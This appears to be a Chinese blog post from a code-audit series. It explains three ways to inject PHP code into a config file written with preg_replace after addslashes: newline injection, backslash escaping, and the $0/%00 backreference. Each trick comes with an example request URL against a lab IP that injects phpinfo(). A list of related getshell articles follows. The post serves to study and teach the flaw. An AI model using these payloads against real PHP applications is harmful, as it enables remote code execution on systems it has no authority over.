【代码审计】PHP写入配置文件getshell

最新推荐文章于 2024-05-15 09:20:13 发布
最新推荐文章于 2024-05-15 09:20:13 发布
阅读量721 收藏 1
点赞数
分类专栏: 【代码审计】 # 代码审计系列

看到小密圈的一个关于配置文件写入的题目,做一下记录。

问题代码:

1.php的内容如下:

config.php的内容如下:

preg_replace — 执行一个正则表达式的搜索和替换
mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] )
搜索subject中匹配pattern的部分, 以replacement进行替换。

1)利用换行

首先请求:http://192.168.192.120/1.php?option=123%27;%0aphpinfo();//
然后查看下config.php的内容:

然后在请求:http://192.168.192.120/1.php?option=123
然后查看下config.php的内容:

2)利用转义

传入参数\’,经过addslashes处理后,会变为\\\’,随后preg_replace会将两个连续的\合并为一个,也就是将\\\’转为\\’,这样我们就成功引入了一个单引号,闭合了前面的单引号。
请求:http://192.168.192.120/1.php?option=123\%27;phpinfo();//
然后查看下config.php的内容:

3)利用\0和$0

首先请求:http://192.168.192.120/1.php?option=;phpinfo();
然后查看下config.php的内容:

preg_replace的replacement中可以包含捕获组,\0或者$0表示完整的匹配。
然后访问:http://192.168.192.120/1.php?option=$0

或者访问http://192.168.192.120/1.php?option=%00
%00在经过addslashes处理后会变成\0

FLy_鹏程万里
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MIPCMS 远程写入配置文件Getshell-1.pdf
04-22
### MIPCMS 远程写入配置文件Getshell 漏洞分析与防御 #### 一、背景介绍 MIPCMS是一款广泛应用于企业网站管理的内容管理系统。然而,任何软件都可能面临安全挑战,MIPCMS也不例外。在MIPCMS内容管理系统V3.1.0...
【实战篇】第16篇:MIPCMS 远程写入配置文件Getshell1
08-03
【实战篇】第16篇:MIPCMS 远程写入配置文件Getshell1 在本文中,我们将深入探讨MIPCMS内容管理系统V3.1.0中的一个安全漏洞,该漏洞允许攻击者通过远程写入配置文件实现Getshell。MIPCMS是一款基于PHP的开源内容...
php写入配置文件getshell,MIPCMS V3.1.0 远程写入配置文件Getshell过程分析(附批量getshell脚本)...
weixin_36073959的博客
03-17 530
0x01 前言看下整体的结构,用的是thinkPHP的架构,看到了install这个文件没有可以绕过install.lock进行重装,但是里面有一个一定要验证数据库,又要找一个SQL的注入漏洞。想起前几天大表哥Bypass发了一篇好像是关于mipcms的漏洞,赶紧去翻了一下,又学到不少技巧,这个技巧可以用在我上次发的一篇ZZCMS 8.2任意文件删除至Getshell的文章,里面有有个getshe...
php写入配置文件getshell,帝国CMS(EmpireCMS) v7.5配置文件写入漏洞分析
weixin_33256233的博客
03-17 281
帝国cms(empirecms) v7.5配置文件写入漏洞分析一、漏洞描述该漏洞是由于安装程序时没有对用户的输入做严格过滤,导致用户输入的可控参数被写入配置文件,造成任意代码执行漏洞。二、漏洞复现1、漏洞出现位置如下图,phome_表前缀没有被严格过滤导致攻击者构造恶意的代码2、定位漏洞出现的位置,发现在/e/install/index.php,下图可以看到表名前缀phome_,将获取表名前缀交给...
php代码审计参考
最新发布
A526847的博客
05-15 1325
== 在进行比较的时候,会先判断两种字符串的类型是否相等,当等号两边类型不同时,会先转换 为相同的类型,再对转换后的值进行比较,如果比较一个数字和字符串或者涉及到数字内容的字符 串,则字符串会被转换成数值并且比较按照常数值进行比较.。0e开头的全部相等(绕过==判断),两个字符串转换成MD5值时都是0e开头,0e 纯数字这种格式 的字符串在判断相等的时候会被认为是科学计数法的数字,先做字符串到数字的转换。PHP 中的许多预定义变量都是“超全局的”,这意味着它们在一个脚本的全部作用域中都可用。
Discuz X 3.4 系列漏洞梳理
热门推荐
weixin_50464560的博客
04-05 2万+
分析了目前已经公开的Dz3.4系列漏洞,作为学习和记录。 Discuz!X ≤3.4 任意文件删除漏洞 1、简述 漏洞原因:之前存在的任意文件删除漏洞修复不完全导致可以绕过。 漏洞修复时间:2017年9月29日官方对gitee上的代码进行了修复 2、复现环境 因为官方提供的下载是最新的源码,漏洞修复时间是17年9月29日,通过git找一个修复前的版本签出就可。 git checkout 1a912ddb4a62364d1736fa4578b42ecc62c5d0be 通过安装向导安装完.
PHP文件包含利用phpinfo写入shell
qq_63489512的博客
07-11 894
服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当php文件来执行,这会为开发者节省大量的时间。这意味着可以创建供所有网页应用的标准页眉或者菜单文件。当页眉需要更新时,只需更新一个包含文件就可以了。当遇到PHP文件包含漏洞时,如果找不到可以包含的文件,可以通过包含临时文件来GetShell。由于临时文件的文件名是随机的,如果目标网站存在phpinfo,则可以通过phpinfo来获取临时文件名,进而完成包含。
php一个shell脚本文件格式,一篇文章学会——shell脚本编
weixin_35458961的博客
03-23 602
用了caffe有一段时间了,感觉自己shell脚本的能力有待提高,特地从菜鸟笔记处系统的看了一遍,其实学习基础就可,内容也不多,我就不总结了。把网站上的内容用markdown重新编辑了一下,各位可以根据需要看看;第一个shell脚本:打开文本编辑器(可以使用 vi/vim 命令来创建文件),新建一个文件 test.sh,扩展名为 sh(sh代表shell),扩展名并不影响脚本执行,见名知意就好,...
PHP代码审计音频文件.zip
11-02
任务14PHP代码审计之任意文件读取及删除漏洞mp4 任务13:PHP代码审计之目录穿越及文件包含漏洞mp4 任务12:PHP代码审计之文件上传漏洞mp4 任务11:代码审计之CSRF漏洞mp4 任务10:代码审计之XSS漏洞mp4 任务9:代码...
读取配置文件shell脚本实现
07-29
总结一下,这个shell脚本示例展示了如何使用awk命令解析配置文件,提取特定信息,并将这些信息写入新文件。在实际的开发环境中,这种技术可以用于自动化处理配置文件,例如在部署或更新系统时自动应用配置变更。通过...
Seacms代码审计小结(后台多处getshell)1
08-03
Seacms代码审计小结主要关注的是框架中存在的安全漏洞,特别是与文件写入和文件包含相关的风险。在Seacms中,发现了一些未经过滤的文件写入操作和不安全的文件包含行为,这些都可能导致代码执行(getshell)的风险。...
浅析php文件包含及其getshell的姿势
weixin_50464560的博客
05-29 1798
0x1 前言  不管平时在打ctf或者代码审计的过程中,文件包含都是很薄弱、很常见的点,一般的开发人员可能觉得文件包含没有什么大问题,低估其造成的危害,我一个ctf爱好者也是这么认为的,直到最近打了几场ctf都出现了文件包含的点,然后被暴虐,才发现文件包含的利用面很广,所以就此打算篇文章来记录下自己的学习过程。 0x2 认识和了解包含函数  PHP里面共有4个与文件包含相关的函数,分别是: include require include_once require_once 查看相关函数的文档了解他们
discuz uc.php漏洞利用,Discuz的利用UC_KEY进行getshell
weixin_40001048的博客
03-20 320
简要描述:知key得shell。详细说明:code 区域$configfile = preg_replace("/define\('UC_API',\s*'.*?'\);/i", "define('UC_API', '".addslashes($UC_API)."');", $configfile);这句代码是有漏洞的。如果我第一次提交的是code 区域\');phpinfo();define那句...
php shell,php命令行shell实例详解
weixin_42123191的博客
03-09 206
php 可以像java perl python 那样运行,今天发现如果我早早知道这个,或许我不会去学习java 和 python当年学java不过为了一个程序放在服务器上,不停的跑啊跑,原来 php 也可以。php -hUsage: php [options] [-f] [--] [args...]php [options] -r [--] [args...]php [options] [-B...
phpshell,如何利用PHPShell
weixin_42134097的博客
03-09 732
Shell是什么?熟悉Linux的人应该都知道,Shell是一种脚本程序,底层应该是用C语言的。我们其实是仿造的Shell的实现。怎么可以用PHP呢?实际上要说的是用PHP如何实现一组控制台程序。控制台程序应该明白了吧!就是典型的黑白屏程序。第一步要解决执行问题:我们可以成.php文件,然后调用php xxx.php就可以执行了。这个决定与你的PHP在编译的时候支持CLI。当然这个也是正篇文...
phpshell,php命令行shell实例详解
weixin_36150355的博客
03-09 165
php 可以像java perl python 那样运行,今天发现如果我早早知道这个,或许我不会去学习java 和 python当年学java不过为了一个程序放在服务器上,不停的跑啊跑,原来 php 也可以。php -hUsage: php [options] [-f] [--] [args...] php [options] -r [--] [args...] php [options] [...
PHP正则配合配置文件导致Getshell
weixin_30888707的博客
12-21 356
PHP正则配合配置文件导致Getshell,偶然间看到的一个题目, p 牛的小密圈的一个问题。 分析一下,漏洞代码: index.php <?php $str=addslashes($_GET['option']); $file=file_get_contents('option.php'); $file=preg_replace('|\$option=\'.*\';|',...
后台getshell常用技巧
黑面狐
04-03 1万+
1.利用文件上传漏洞,找文件上传处想办法上传php文件。 一些网站在设置可以允许修改上传的文件类型则直接添加php 有时候会还有检测是否为php文件,可以通过文件名变形,大小,双等形式绕过,只要是黑名单的都比较好绕过 很多cms还有.hatccess文件禁止访问或者执行这个目录下的文件的情况 这种情况直接上传一个.hatccess文件覆盖这个,让其失效。 或者上传不重命名的...
php文件包含及利用其getshell
wh11te的博客
07-26 1461
0x1 php中与包含有关的函数 php中一共有4个文件包含相关的函数,分别为: include 如果未找到文件,发出警告,继续执行。 require 如果未找到文件,发出致命错误,停止执行。 include_once 与include相同,只包含一次。 require_once 与require相同,只包含一次。 ...
Seacms代码审计:getshell漏洞深度解析
在本文档中,作者分享了对Seacms框架的代码审计小结,重点关注了文件写入和文件包含两个方面的潜在安全问题。Seacms框架中存在一些未经过滤的文件操作,可能导致代码注入漏洞。 首先,作者提到框架中广泛使用了`...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值